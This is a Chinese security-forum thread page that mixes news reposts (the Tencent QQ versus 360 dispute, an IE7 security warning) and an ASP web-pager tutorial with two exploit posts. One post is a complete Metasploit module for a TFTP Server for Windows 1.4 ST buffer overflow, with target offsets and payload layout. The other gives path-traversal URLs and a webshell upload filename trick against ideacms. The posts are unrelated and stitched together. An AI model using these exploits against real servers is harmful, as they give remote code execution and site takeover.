返回列表 发帖

四家公司宣布抵制“360” 用户桌面争夺战升级

中新社北京11月5日电(** 刘育英)金山、百度、可牛、遨游四家网络公司5日上午举办新闻发布会,宣布将不兼容360安全卫士软件,并揭露360的“八大谎言”,这使得腾讯QQ与360的商业大战进一步升级。  据发布会组织方透露,此次联合宣布不兼容360的公司原定有5家,但搜狗因故未能出席上午的发布会。这四家企业宣布,将不再兼容360安全卫士(以下简称360),不过没有公布具体方案。截至发稿,用户仍可以使用百度搜索、金山WPS办公软件等软件。因此外界分析,四家公司此举意在给360施加舆论压力。
  3日晚上,腾讯QQ宣布不与360兼容,用户必须在二者中选择其一。其主要原因是360在此前声称腾讯QQ扫描用户硬盘,并侵犯用户隐私,还推出监测QQ扫描行为以及可以卸载QQ组件的程序。
  **从这次发布会了解到,四家公司对于360的不满主要在于,互联网用户通过360可以很方便地卸载其他公司的软件及插件,涉嫌不正当竞争。四家公司称,360“欺诈和绑架用户”,并且表示将“与360战斗到底”。

  这四家公司还发布360公司的“八大谎言”,包括“360漏洞补丁最安全”、“云查杀”、“尊重用户”等。四家公司还对腾讯进行声援,表示腾讯QQ是否扫描硬盘需要由第三方来界定,而不是由一家公司来进行执法。
  腾讯有10亿注册用户,360也有3.5亿。两家网络公司的商战波及上亿用户。据悉,工信部与公安部已经介入腾讯与360之间进行调停,4日上午用户发现腾讯QQ与360已经可以同时使用。但是四家公司的加入,使得大战进一步复杂化。(完)

 

您可能还想看的主题:

非安全5周年纪念 团队T恤出炉

关于信息安全等级保护

Discuz! X2.5 远程代码执行漏洞及EXP

mstsc连接服务器就出现自动注销用户的现象

Google Chrome跨站脚本过滤器绕过漏洞

Centos 系统安全配置详解

谷歌宣布将关闭谷歌视频和Tags服务

BigAce 2.7.5 内容管理系统FCK编辑器上传漏洞

WordPress用户照片组件远程文件上传漏洞

熊猫卫士本地提权漏洞

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小一发表,本帖发表者小一符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小一和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

用ASP编写网络传呼机
各位喜欢上网冲浪的朋友一定都去过网易的虚拟社区吧,里面的传呼台功能想必是很得大家的喜爱。通过传呼台,我们可以呼叫任何一个目前在虚拟社区里面冲浪的网友,可以实现在线交谈哦。
  其实,我们使用ASP完全可以实现同网易虚拟社区里面传呼台同样的功能,怎么?不相信?那就跟随我一步一步用ASP来实现网络传呼机吧。
  Active Server Pages(ASP)是服务器端脚本编写 环境,使用它可以创建和运行动态、交互的 Web 服务器应用程序。使用 ASP 可以组合 HTML 页、脚本命令和 ActiveX 组件以创建交互的 Web 页和基于 Web 的功能强大的应用程序。ASP 应用程序很容易开发和修改。
接下来,我们就开始编写我们的网络传呼机了。
首先,实现网络传呼的功能有两种方法:
  一. 利用数据库实现传呼信息的保存和处理
  这种方法的优点是,存储信息处理非常方便,但是它的缺点也是显而易见的,就是增加了服务器端的负担,因为频繁的存储数据库将会大大增加I/O存取次数,导致网站的连接速度变得缓慢。
  二. 直接使用Application来保存传呼信息
  这种方法的优点是,速度明显快于使用数据库来保存传呼信息的方法;缺点是处理信息比较繁琐,但是很值得的哦,我们首先要保证的是整个网站的性能。
  综合上面的因素,我们将采用第二种方法来编写网络传呼机,对于第一种方法,我会在最后简单介绍一下。
  我们的网络传呼机需要三个页面,也就是“传呼台”页面,“显示传呼信息”页面,“监视传呼机”页面。
  “传呼台”页面(bbsSendBegic.asp)是用来向其他在线用户发送信息的页面,自然就好像是我们生活中的传呼台喽。
  “显示传呼信息”页面(bbsSendInfo.asp)是在有人呼叫你的时候,弹出来的显示呼叫内容的页面,就像你自己的BP一样,但我们的网络BP机功能更加强劲哦,他可以即时回复别人给你的信息,也可以稍候再回复,或者干脆清除掉这条信息。
  “监视传呼机”页面(bbsAutoSearch.asp)是随时监视是否有人呼叫你的页面,就像一个不知疲倦的自动机器人一样一直在监视所有的传呼信息,并且会过滤出来只属于你的传呼信息。
由于篇幅所限,欢迎下载源程序及更详细的说明(href="http://download1.ccidnet.com/source_code/vb/netpager.zip),文件大小:39K


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

百度一下,找到相关网页约15,600篇,用时0.001秒     


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

TFTP Server for Windows 1.4 ST WRQ Buffer Overflow
require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote


  Rank = NormalRanking
  include Msf::Exploit::Remote::Udp


  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',
      'Description'     => %q{
          This module exploits a vulnerability found in TFTP Server 1.4 ST.  The flaw
        is due to the way TFTP handles the filename parameter extracted from a WRQ request.
        The server will append the user-supplied filename to TFTP server binary's path
        without any bounds checking, and then attempt to open this with a fopen(). Since
        this isn't a valid file path, fopen() returns null, which allows the corrupted
        data to be used in a strcmp() function, causing an access violation.


        Since the offset is sensitive to how the TFTP server is launched, you must know
        in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'
        , and then manually select your target accordingly. A successful attempt will lead
        to remote code execution under the context of SYSTEM if run as a service, or
        the user if run as a standalone. A failed attempt will result a denial-of-service.
      },
      'Author'          =>
        [
          'Mati Aharoni', #Initial discovery, PoC
          'Datacut'       #Metasploit
        ],
      'References'      =>
        [
          [ 'CVE', '2008-1611' ],
          [ 'OSVDB', '43785' ],
          [ 'BID', '18345' ],
          [ 'EDB', '5314' ]
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' =>'seh',
        },
      'Payload'         =>
        {
          'Space'           => 600,
          'BadChars'        => "x00x2f",
          'StackAdjustment' => -3500
        },
      'Platform'        => 'win',
      'Targets'         =>
        [
          # datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1.
          # possible may work for other service packs and or vista
          # Rets = P/P/R from tftpserversp.exe
          [ 'Windows XP SP2/SP3 EN Service Mode',       { 'Ret' => 0x416801 , 'Offset' => 1203} ],
          [ 'Windows XP SP2/SP3 EN Standalone Mode',    { 'Ret' => 0x416801 , 'Offset' => 1487} ],
          [ 'Windows 7 SP0/SP1 EN x64 Service Mode',    { 'Ret' => 0x416801 , 'Offset' => 1217} ],
          [ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ],
          [ 'Windows 7 SP0/SP1 EN x86 Service Mode',    { 'Ret' => 0x416801 , 'Offset' => 1223} ],
          [ 'Windows 7 SP0/SP1 EN x86 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1507} ]
        ],
      'Privileged'  => false,
      'DisclosureDate'=> 'Mar 26 2008',
      'DefaultTarget' => 4))  #TFTP is installed as a service


    register_options(
      [
        Opt::RPORT(69)
      ], self.class)
  end




  def exploit
    connect_udp


    nops = make_nops(50)
    lead = rand_text_alphanumeric(target['Offset'] - payload.encoded.length - nops.length)
    near = "xe9x80xfdxffxff"    #jump back 640 bytes to the nop sled
    nseh = "xebxf9" + make_nops(2) #jump back 7 bytes to the long jump


    evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')
    mode = "netascii"


    #Send the WRQ packet (header "x00x02")
    sploit = "x00x02" + evil + "" + mode +""


    udp_sock.put(sploit)


    handler
    disconnect_udp
  end


end


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

微软发布IE7最新安全警告 Vista不受影响
微软今天发布了针对IE浏览器当前版本的安全警告,新发现的IE安全漏洞可对Windows XP、Server 2003和Windows 2000系统造成影响,但Vista系统不受影响。IE6.0以前的版本也受影响,目前发现的主要是运行当前版本IE7的XP/2000/Server 2003系统。微软在其安全博客中发布公告称,Windows系统运行经过特殊处理的URLs或URIs时可能出现安全威胁。IE7对一个Windows组件进行升级,并对IE和Windows Shell之间在运行URLs或URIs时的通信进行调整,当应用程序向Windows传送未经激活的URLs或URIs时,漏洞会被利用以实施恶意攻击。
攻击得逞需要一个前提,即用户必须激活一个未经过验证的经过特殊编写的URLs或URIs。比如,用户会点击邮件中的一个链接,这样有可能使恶意代码被激活并运行。
微软提供的唯一建议是,时刻保持防火墙处于打开状态,并及时更新,这意味着微软可能在例行的每月星期二补丁日之外发布补丁。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

ideacms文章管理系统多处上传漏洞
漏洞文件:adminadmin_upfile.asp
漏洞代码:
<%
'略
    dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath
    dim dirTemplate : dirTemplate="../Upload"
    dim path : path=getForm("path","get") : if isNul(path) then path= dirTemplate
    if left(path,9)<>"../Upload" then  alert "只允许编辑Upload目录","admin_upfile.asp" : die ""
'略
%>
判断问题 利用方法:
http://127.0.0.1/admin/admin_upfile.asp?path=../Upload/../../
漏洞文件:adminadmin_template.asp
漏洞代码:
<%
checkPower
'略
    dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath
    dim dirTemplate : dirTemplate="../template"
    dim path : path=getForm("path","get") : if isNul(path) then path= dirTemplate
    if left(path,11)<>"../template" then  alert "只允许编辑template目录","admin_template.asp" : die ""
'略
%>
判断问题 利用方法:
http://127.0.0.1/admin/admin_template.asp?action=edit&amp;filedir=../template/../robots.txt
获取WEBshell方法:
/admin/upload.asp
<%
'略
    attachdir="/"+sitePath+"upload"'上传文件保存路径,结尾不要带/
    dirtype=2'1:按天存入目录 2:按月存入目录 3:按扩展名存目录  建议使用按天存
    maxattachsize=2097152'最大上传大小,默认是2M
    upext="txt,rar,zip,jpg,jpeg,gif,png,swf,wmv,avi,wma,mp3,mid"'上传扩展名
     
'略
                if upfile.isErr=3 then
                    err="上传文件扩展名必需为:"+upext
                else
                    err=upfile.ErrMessage
    '略
        Dim tmpPath
        isErr_=0
        Set oFileStream = CreateObject ("ADODB.Stream")
        oFileStream.Type = 1
        oFileStream.Mode = 3
        oFileStream.CharSet = "gb2312"
    '略
        tmpPath=Split(Path,".")(0)
        FileExt=GetFileExt(Path)
        if Over then
            if isAllowExt(FileExt) then
                oFileStream.SaveToFile tmpPath &amp; "." &amp; FileExt,2
                if Err.number<>0 then OutErr("保存文件时出错,请检查路径,是否存在该上传目录!该文件保存路径为" &amp; tmpPath &amp; "." &amp; FileExt)
            Else
                isErr_=3
                ErrMessage_="该后缀名的文件不允许上传!"
                OutErr("该后缀名的文件不允许上传")
            End if
        Else
    '略
Public Function FileData(Item)
    isErr_=0
    if file.Exists(Item) then
        if isAllowExt(File(Item).FileExt) then
            '略
            Else
            isErr_=3
            ErrMessage_="该后缀名的文件不允许上传"
            OutErr("该后缀名的文件不允许上传")
            FileData=""
        End if
    else
        ErrMessage_="不存在该对象(如该文件没有上传,文件为空)!"
        OutErr("不存在该对象(如该文件没有上传,文件为空)")
'略
%>
判断问题 构造文件名:one.asp;jpg
上传地址:
http://127.0.0.1/admin/editor/upload.htm
系统其他敏感信息:
默认数据库地址:date#A5E371101111.mdb


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表